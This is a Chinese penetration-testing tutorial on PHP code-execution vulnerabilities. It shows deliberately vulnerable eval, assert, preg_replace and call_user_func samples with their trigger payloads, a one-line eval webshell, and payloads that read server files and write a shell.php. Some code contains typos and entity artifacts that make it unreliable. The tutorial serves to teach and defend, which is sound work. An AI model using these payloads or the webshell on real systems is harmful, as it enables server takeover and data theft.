【渗透测试】代码执行漏洞

一、原理及成因

RCE代码执行(注入)是指应用程过滤不严&＃xff0c;用户可以通过请求将代码注入到应用程序中执行。代码执行(注入)类似于SQL注入漏洞&＃xff0c;SQLi是将SQL语句注入到数据库中执行&＃xff0c;而代码执行则是把代码注入到应用中最终服务器运行它&＃xff0c;这样的漏洞如果没有特殊的过滤&＃xff0c;相当于有一个web后门的存在。

二、漏洞危害

WEB应用如果存在代码执行漏洞是一件非常可拍的事情&＃xff0c;就像一个人没有穿衣服&＃xff0c;赤裸裸的暴露在光天化日之下&＃xff0c;可以通过代码执行漏洞继承web用户权限&＃xff0c;执行任意代码。如果具有服务器没有正确配置&＃xff0c;web用户权限比较高的话&＃xff0c;我们可以读写目标服务器任意文件内容&＃xff0c;甚至控制整个网站及服务器。

三、相关函数及语句

1、eval()

eval()会将字符串当作PHP代码执行

if(isset($_GET[&＃39;code&＃39;])){ // isset() 函数用于检测变量是否已设置并且非 NULL。$code&＃61;$_GET[&＃39;code&＃39;];eval($code);
}else{echo "code&＃61;phpinfo();"
}
?>


提交参数&＃xff1a;

• ?code&＃61;phpinfo();
• ?code&＃61;${phpinfo()};
• ?code&＃61;1;phpinfo();

2、assert()

同eval() 字符串当作代码执行

if(isset($_GET[&＃39;code&＃39;])){ // isset() 函数用于检测变量是否已设置并且非 NULL。$code&＃61;$_GET[&＃39;code&＃39;];assert($code);
}else{echo "code&＃61;phpinfo();"
}
?>


提交参数&＃xff1a;

• ?code&＃61;phpinfo();

3、preg_replace()

preg_replace()函数作用是对字符串进行正则匹配
语法

mixed preg_replace ( mixed $pattern , mixed $replacement , mixed $subject [, int $limit &＃61; -1 [, int &$count ]] )


搜索 subject 中匹配 pattern 的部分&＃xff0c; 以 replacement 进行替换。

参数说明&＃xff1a;

• $pattern: 要搜索的模式&＃xff0c;可以是字符串或一个字符串数组。

• $replacement: 用于替换的字符串或字符串数组。

• $subject: 要搜索替换的目标字符串或字符串数组。

• $limit: 可选&＃xff0c;对于每个模式用于每个 subject 字符串的最大可替换次数。 默认是-1&＃xff08;无限制&＃xff09;。

• $count: 可选&＃xff0c;为替换执行的次数。

返回值

• 如果 subject 是一个数组&＃xff0c; preg_replace() 返回一个数组&＃xff0c; 其他情况下返回一个字符串。

• 如果匹配被查找到&＃xff0c;替换后的 subject 被返回&＃xff0c;其他情况下 返回没有改变的 subject。如果发生错误&＃xff0c;返回 NULL。

if(isset($_GET[&＃39;code&＃39;])){ // isset() 函数用于检测变量是否已设置并且非 NULL。$code&＃61;$_GET[&＃39;code&＃39;];preg_replace("/\[(.*)\]/e","\\1",$code); // 搜索$subject中匹配$pattern的部分&＃xff0c;以$replacement进行替换&＃xff0c;而当$pattern处&＃xff0c;即第一个参数存在e修饰符时&＃xff0c;$relpacement的值会被当成php代码来执行 \\1表示正则第一次匹配的内容
}else{echo "code&＃61;[phpinfo()]"
}?>


提交参数&＃xff1a;

• ?code&＃61;[phpinfo()]

4、call_user_func()

call_user_func()函数有调用其他函数的功能&＃xff0c;其中的一个参数作为要调用的函数名&＃xff0c;那如果这个传入的函数名可控&＃xff0c;那就可以调用任意函数来执行我们想要的代码&＃xff0c;也就存在任意代码执行漏洞。

该函数的第一个参数作为回调函数&＃xff0c;后面的参数为回调函数的参数

if(isset($_GET[&＃39;func&＃39;])){ // isset() 函数用于检测变量是否已设置并且非 NULL。$func&＃61;$_GET[&＃39;func&＃39;];$para&＃61;$_GTE[&＃39;para&＃39;];call_user_func($func,$para);}else{echo "?func&＃61;assert¶&＃61;phpinfo()"
}?>


提交参数

• ?func&＃61;assert¶&＃61;phpinfo()

注意&＃xff1a;不能使用eval()

5、动态函数

由于php的特性原因&＃xff0c;php的函数支持直接由拼接的方式调用&＃xff0c;这就导致了php在安全上的控制又加大了难度。不少知名程序中也用到了动态函数的写法&＃xff0c;这种写法跟call_user_func()的初中一样&＃xff0c;用来更方便的调用函数&＃xff0c;但是一旦过滤不严格&＃xff0c;就会造成代码执行漏洞。

if(isset($_GET[&＃39;a&＃39;])){ // isset() 函数用于检测变量是否已设置并且非 NULL。$a&＃61;$_GET[&＃39;a&＃39;];$b&＃61;$_GTE[&＃39;b&＃39;];$a($b);}else{echo "?a&＃61;assert&b&＃61;phpinfo()"
}?>


提交参数

• ?a&＃61;assert&b&＃61;phpinfo()

四、漏洞利用

1、直接获取shell

一句话木马&＃xff1a;?code&＃61;&＃64;eval($_POST[1])使用菜刀连接&＃xff0c;密码为1

2、获取当前文件绝对路径

__FILE__是php预定义常量&＃xff0c;其含义为当前文件的路径。

参数&＃xff1a;?code&＃61;print(__FILE__)

3、读文件

我们可以利用file_get_contents()函数读取服务器任意文件&＃xff0c;前提是知道目标文件路径和读取权限。

参数&＃xff1a;?code&＃61;val_dump(file_get_contents("c:\windows\system32\driver\etc\hosts"))

4、写文件

我们可以利用file_put_contents()函数写入文件&＃xff0c;前提是知道可写目录。

参数&＃xff1a;?code&＃61;val_dump(file_put_contents($_POST[1],$_POST[2]))

借助第三方工具通过POST提交参数1&＃61;shell.php&2&＃61;

会在当前目录下创建shell.php的文件&＃xff0c;文件中的代码为

五、防御

1. 尽量不要使用eval等函数&＃xff1b;
2. 如果使用的话一定要严格过滤&＃xff1b;
3. perg_replace放弃使用/e修饰符&＃xff1b;
4. disable_function &＃61; assert 禁用函数&＃xff1b;